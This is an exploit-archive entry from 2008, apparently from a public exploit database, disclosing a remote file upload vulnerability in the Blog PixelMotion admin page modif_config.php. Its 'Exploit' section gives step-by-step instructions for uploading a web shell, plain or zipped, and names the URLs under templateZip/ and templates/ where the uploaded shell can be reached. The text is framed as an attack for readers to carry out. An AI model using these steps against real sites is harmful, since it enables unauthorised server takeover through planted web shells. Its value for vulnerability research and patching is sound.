Blog PixelMotion (modif_config.php) Remote File Upload Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Blog PixelMotion (modif_config.php) Remote File Upload Vulnerability
# Published : 2008-04-06
# Author : JiKo
# Previous Title : Blog PixelMotion (sauvBase.php) Arbitrary Database Backup Vulnerability
# Next Title : Blog PixelMotion (index.php categorie) SQL Injection Vulnerability

-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko [jiki team]
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : Blog PixelMotion 
# Bug   : Remote File Upload Vulnerability
# Download  : http://www.pixelmotion.org/zip/blog.zip
 
=========================JIkI Team===================
# Exploit  :
uploa your shell  
  http://[Site]/[script]/admin/modif_config.php
http://[Site]/[script]/templateZip/[shell]
###################OR################
upload your shell compressed by Zip forme
  http://[Site]/[script]/admin/modif_config.php
after upload your shell go to
  http://[Site]/[script]/templates/[shell]
because your sheel has extract at templates
and has upload at templateZip
=========================JIKI Team===================
 greetz : all my friend and H-T Team 
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# www.Syue.com [2008-04-06]